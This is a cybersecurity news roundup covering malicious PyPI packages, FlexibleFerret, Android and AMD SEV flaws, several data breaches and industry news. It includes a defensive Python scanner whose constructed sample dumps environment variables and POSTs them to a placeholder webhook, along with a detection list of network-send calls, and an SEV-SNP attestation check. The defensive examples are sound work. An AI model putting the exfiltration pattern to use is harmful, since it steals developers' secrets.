👉 What’s the latest in the cyber world today?
Malicious PyPI Packages, Data Harvesting Tools, FlexibleFerret Malware, macOS, Apple XProtect Detection, Google Patch, Android Kernel, Zero-Day, ValleyRAT, Finance Departments, AMD Secure Encrypted Virtualization, Microcode Loading, Grubhub Hack, Personal Data, Mizuno USA, Data Breach, Magic Vacation Title, O’Connor Corporation, DFB Sales, Sensitive Employee Information, Musk Task Force, Sensitive Government Systems, Canada, DeFi Platforms, Exploited Vulnerabilities, Cyber Threats, Australia, Sanctions, Terrorgram, Riot, Funding, Cybersecurity Training, Employee Risks
🚨 Cyber Alerts
1. Malicious PyPI Packages Harvest User Data
Two malicious Python packages, deepseeek and deepseekai, were found on the PyPI repository, built to collect sensitive user data and environment variables. They targeted developers, especially those working in AI and machine learning, by trading on interest in the trending DeepSeek name. Once executed, they harvested API keys, credentials and access tokens from the environment and transmitted them to a command-and-control endpoint hosted on the Pipedream platform.
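The pattern described above (read the process environment, then ship it to a webhook) is easy to spot statically before a package is installed. The following is an added example for this digest, not code from PyPI or from the malicious packages themselves: it walks a Python file's AST and flags environment reads that co-occur with a network send, and notes whether anything runs at import time. The two sample sources are constructed for the demonstration, and the webhook URL is a placeholder rather than the real command-and-control endpoint.

```python
"""Static check for the env-harvest-then-POST pattern in a Python package file.

Added example for this digest, not code from PyPI or from the deepseeek/
deepseekai packages. Sample sources below are constructed; the URL is a
placeholder.
"""
import ast

# Fully qualified names that read secrets from the process environment.
ENV_READS = {"os.environ", "os.getenv", "os.environb"}
# Fully qualified names that can move data to a remote host.
NET_SENDS = {
    "requests.post", "requests.get", "requests.put",
    "urllib.request.urlopen", "http.client.HTTPSConnection",
    "http.client.HTTPConnection", "socket.socket",
}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_aliases(tree):
    """Map each local name bound by an import to the module path it came from."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                local = a.asname or a.name.split(".")[0]
                aliases[local] = a.name if a.asname else local
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def scan_source(src):
    """Return the env reads, network sends and import-time execution found in src."""
    tree = ast.parse(src)
    aliases = _import_aliases(tree)
    found = {"env_reads": set(), "net_sends": set(), "runs_on_import": False}
    for node in ast.walk(tree):
        name = _dotted(node)
        if name is None:
            continue
        head, _, rest = name.partition(".")
        full = aliases.get(head, head) + (f".{rest}" if rest else "")
        if full in ENV_READS:
            found["env_reads"].add(full)
        if full in NET_SENDS:
            found["net_sends"].add(full)
    # A bare call at module level fires as soon as the package is imported,
    # which is all a lookalike package needs once a developer has installed it.
    found["runs_on_import"] = any(
        isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
        for stmt in tree.body
    )
    return found


def is_suspicious(src):
    """Exfiltration pattern: the environment is read AND a network send is present."""
    f = scan_source(src)
    return bool(f["env_reads"]) and bool(f["net_sends"])


# Constructed sample mimicking the reported behaviour: dump os.environ, POST it.
MALICIOUS_SAMPLE = '''
import os
import requests as r

def _phone_home():
    payload = dict(os.environ)            # API keys, tokens, cloud creds
    r.post("https://hook.example.invalid/", json=payload)   # placeholder URL

_phone_home()
'''

# Constructed sample that reads one variable but never touches the network.
BENIGN_SAMPLE = '''
import os

def cache_dir():
    return os.getenv("XDG_CACHE_HOME", os.path.expanduser("~/.cache"))
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        verdict = "SUSPICIOUS" if is_suspicious(src) else "ok"
        print(label, scan_source(src), verdict)
```

Run it over the files in an sdist or wheel (setup.py, the package's __init__.py and any module imported from it) before installing. The import aliasing is what keeps `import requests as r` from slipping past a naive string search; a real scanner would also follow `exec`/`compile` of decoded strings, which this example does not.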
2. FlexibleFerret Malware Targets macOS Users
A new malware variant named FlexibleFerret has been discovered targeting macOS users and evading Apple's XProtect signatures. Part of a broader campaign linked to North Korean threat actors, the malware is disguised as legitimate software for virtual interviews, tricking job seekers and developers into installing it. Although Apple recently added signatures for this malware family to XProtect, FlexibleFerret was still undetected at the time of reporting, and it continues to spread through fake installer packages such as versus.pkg.
3. Google Patches Critical Android Kernel Flaw
The February 2025 Android security updates address 48 vulnerabilities, including a kernel zero-day (CVE-2024-53104, an out-of-bounds write in the USB Video Class driver) that Google says may be under limited, targeted exploitation. The update also resolves a critical issue in Qualcomm's WLAN component (CVE-2024-45569), a memory-corruption flaw that remote attackers could use to execute arbitrary code or crash the device. Google Pixel devices receive the fix immediately, while other vendors will take longer to roll it out.
4. ValleyRAT Trojan Targets Finance Departments
Cybersecurity experts have reported an increase in cyberattacks involving ValleyRAT, a Remote Access Trojan (RAT) linked to the Silver Fox APT group. This sophisticated malware targets finance and accounting departments, leveraging advanced delivery techniques to infiltrate organizational networks. Recent updates reveal that attackers now use fake software mimicking legitimate applications to deliver the malware, often through phishing websites or counterfeit domains.
5. AMD SEV Flaw Exposes Confidential Data
A security vulnerability has been discovered in AMD's Secure Encrypted Virtualization (SEV) feature that could allow an attacker with local administrator privileges to load malicious CPU microcode. The flaw, tracked as CVE-2024-56161, carries a CVSS score of 7.2 (high) and could compromise the confidentiality and integrity of virtual machines running under SEV-SNP. It stems from improper signature verification in the microcode patch loader in AMD's CPU ROM, so a forged patch that should be rejected is accepted instead. Mitigation requires a system BIOS update carrying the new microcode from the platform vendor and, on some platforms, an SEV firmware update so that guests can confirm through attestation that the fix is in place.
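For a confidential workload, the practical question is whether the host it landed on is running microcode at or above the fixed level, and the place to answer that is the TCB fields of the SEV-SNP attestation report rather than anything the hypervisor says. The following is an added example for this digest, not AMD's own tooling. It assumes the ATTESTATION_REPORT layout from AMD's SEV-SNP ABI specification (VERSION at 0x000, CURRENT_TCB at 0x038, REPORTED_TCB at 0x180, COMMITTED_TCB at 0x1E0, 0x4A0 bytes total, with a TCB_VERSION packing BOOT_LOADER, TEE, SNP and MICROCODE into bytes 0, 1, 6 and 7). The report it parses is constructed and unsigned, and MIN_MICROCODE_SVN is a placeholder: the real minimum must be taken from AMD's bulletin for the CPU family in use.

```python
"""Check the microcode SVN in an SEV-SNP attestation report against a policy.

Added example for this digest, not AMD's tooling. Offsets follow the
ATTESTATION_REPORT layout in the SEV-SNP ABI spec. The sample report is
constructed (unsigned, other fields zero); MIN_MICROCODE_SVN is a placeholder.
"""
import struct

REPORT_LEN = 0x4A0
OFF_VERSION = 0x000
OFF_CURRENT_TCB = 0x038
OFF_REPORTED_TCB = 0x180
OFF_COMMITTED_TCB = 0x1E0
TCB_FIELDS = ("current_tcb", "reported_tcb", "committed_tcb")

# Placeholder policy value; take the real number from AMD's bulletin.
MIN_MICROCODE_SVN = 0x50


def parse_tcb(raw):
    """Unpack an 8-byte little-endian TCB_VERSION into its component SVNs."""
    boot_loader, tee, _, _, _, _, snp, microcode = struct.unpack("<8B", raw)
    return {"boot_loader": boot_loader, "tee": tee, "snp": snp, "microcode": microcode}


def parse_report(report):
    """Pull the version and the three TCB views out of a raw attestation report."""
    if len(report) != REPORT_LEN:
        raise ValueError(f"expected {REPORT_LEN} bytes, got {len(report)}")
    return {
        "version": struct.unpack_from("<I", report, OFF_VERSION)[0],
        "current_tcb": parse_tcb(report[OFF_CURRENT_TCB:OFF_CURRENT_TCB + 8]),
        "reported_tcb": parse_tcb(report[OFF_REPORTED_TCB:OFF_REPORTED_TCB + 8]),
        "committed_tcb": parse_tcb(report[OFF_COMMITTED_TCB:OFF_COMMITTED_TCB + 8]),
    }


def microcode_meets_policy(report, min_svn=MIN_MICROCODE_SVN):
    """True only if every TCB view carries a microcode SVN at or above min_svn.

    REPORTED_TCB is chosen by the host (it selects which VCEK signs the
    report) and COMMITTED_TCB is the lowest level the firmware may roll back
    to, so a relying party checks all three rather than trusting one view.
    """
    parsed = parse_report(report)
    return all(parsed[f]["microcode"] >= min_svn for f in TCB_FIELDS)


def make_tcb(boot_loader, tee, snp, microcode):
    """Pack a TCB_VERSION with the reserved bytes 2..5 zeroed."""
    return struct.pack("<8B", boot_loader, tee, 0, 0, 0, 0, snp, microcode)


def build_sample_report(current, reported, committed, version=2):
    """Constructed, unsigned report populated only with the fields this check reads."""
    buf = bytearray(REPORT_LEN)
    struct.pack_into("<I", buf, OFF_VERSION, version)
    buf[OFF_CURRENT_TCB:OFF_CURRENT_TCB + 8] = current
    buf[OFF_REPORTED_TCB:OFF_REPORTED_TCB + 8] = reported
    buf[OFF_COMMITTED_TCB:OFF_COMMITTED_TCB + 8] = committed
    return bytes(buf)


if __name__ == "__main__":
    patched = make_tcb(3, 0, 8, 0x52)   # constructed SVNs, not real platform values
    stale = make_tcb(3, 0, 8, 0x48)
    print(microcode_meets_policy(build_sample_report(patched, patched, patched)))  # True
    print(microcode_meets_policy(build_sample_report(patched, stale, patched)))    # False
```

This check is only meaningful after the report's signature has been verified against the VCEK and AMD's ASK/ARK chain; an unverified report proves nothing about the platform. On the host side the equivalent control is confirming the BIOS carries the vendor's updated microcode, since the guest cannot load microcode itself.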
💥 Cyber Incidents
6. Grubhub Discloses Breach Impacting Users
Grubhub, a major U.S. food delivery service, confirmed that hackers accessed the personal data of customers, merchants, and drivers due to a breach in its internal systems. The breach, linked to unauthorized access through a third-party service provider, led to the exposure of names, email addresses, phone numbers, and partial payment card details. Grubhub acted quickly to terminate the compromised account and remove the provider from its systems, though it has not disclosed the number of affected individuals or when the breach occurred.
7. Mizuno USA Confirms Data Breach and Theft
Mizuno USA has confirmed a data breach resulting from a cyberattack that occurred in late 2024. The breach, discovered in November 2024, involved hackers exfiltrating sensitive data from the company’s network over a period of two months, between August 21, 2024, and October 29, 2024. The stolen information includes personal details such as names, Social Security numbers, financial account information, driver’s license information, and passport numbers.
8. MVT Notifies Customers of Potential Breach
Magic Vacation Title (MVT) recently informed its customers about a potential data breach caused by unauthorized activity in its third-party IT provider’s network. The incident, which was detected around July 23, 2024, led to a thorough investigation and a detailed review of the impacted files. While MVT found no evidence of fraudulent misuse of the data, they have proactively taken steps to enhance their network security. As a precaution, the company is offering complimentary credit monitoring services to affected individuals and advising them to monitor their credit reports and bank statements for any signs of suspicious activity.
9. O’Connor Corporation Reports Data Breach
O’Connor Corporation informed the Maine Attorney General of a data breach that may have involved sensitive personal information. The breach, discovered on December 2, 2024, resulted from a network disruption that allowed unauthorized access to certain systems. Upon investigation, the company determined that from November 23 to December 1, 2024, personal data, including names, Social Security numbers, and financial details, was potentially compromised.
10. DFB Sales Reports Breach Affecting Employees
DFB Sales, Inc. recently reported a data breach that may have exposed sensitive personal information of its employees. The breach was detected on December 27, 2024, after unauthorized activity was found on DFB’s computer network. Upon investigation, DFB determined that an unauthorized third party accessed the company’s systems, potentially compromising personal data including names and Social Security numbers.
📢 Cyber News
11. Musk Task Force Access to Government Systems Sparks Cyber Alarm
Reports have surfaced that a task force led by Elon Musk gained access to sensitive U.S. government systems, raising serious concerns in the cybersecurity community. The task force, operating under the Department of Government Efficiency, reportedly locked out career civil servants from critical systems and accessed sensitive data from the Department of Treasury, including Social Security and Medicare payment systems. This access could undermine years of progress made in securing federal networks, with experts warning of significant risks if the system’s safeguards are compromised.
12. Canadian Charged With Stealing $65 Million
The U.S. Justice Department has charged Andean Medjedovic, a Canadian man, with stealing $65 million by exploiting two decentralized finance (DeFi) platforms. Medjedovic allegedly took advantage of vulnerabilities in smart contracts used by KyberSwap and Indexed Finance, draining millions in digital assets from various liquidity pools. He is now facing multiple charges, including wire fraud and money laundering, with the possibility of serving up to 20 years in prison if convicted.
13. Exploited Vulnerabilities Rise 20% in 2024
In 2024, the number of vulnerabilities exploited in the wild reached 768, a 20% rise from 639 in 2023. VulnCheck reported that 23.6% of these known exploited vulnerabilities were exploited on or before the day their CVE was publicly disclosed. The report notes that while exploitation can occur at any point in a vulnerability's lifecycle, 1% of the CVEs published in 2024 had already been reported as exploited in the wild, a share expected to grow as further exploitation is disclosed.
14. Australia Sanctions White Supremacist Group
Australia has sanctioned the white supremacist online network Terrorgram in response to growing concerns about antisemitism and violent extremism. This move follows similar actions by the U.S. and the U.K., marking the first time Australia has sanctioned an entirely online entity. The sanctions aim to cut off Terrorgram’s access to resources that could support its operations, including funding and recruitment for violent acts. Violation of these sanctions could result in severe penalties, including prison time and hefty fines.
15. Riot Raises $30M for Cybersecurity Training
Riot, a French cybersecurity startup, secured a $30 million Series B funding round, aiming to minimize the attack surface for employees. The company initially focused on training staff through phishing simulations and educational content, now enhanced by a chatbot. With the new funding, Riot is positioned to expand its impact, already reaching 1 million employees across 1,500 companies, including L’Occitane and Le Monde.
Copyright © 2025 CyberMaterial. All Rights Reserved.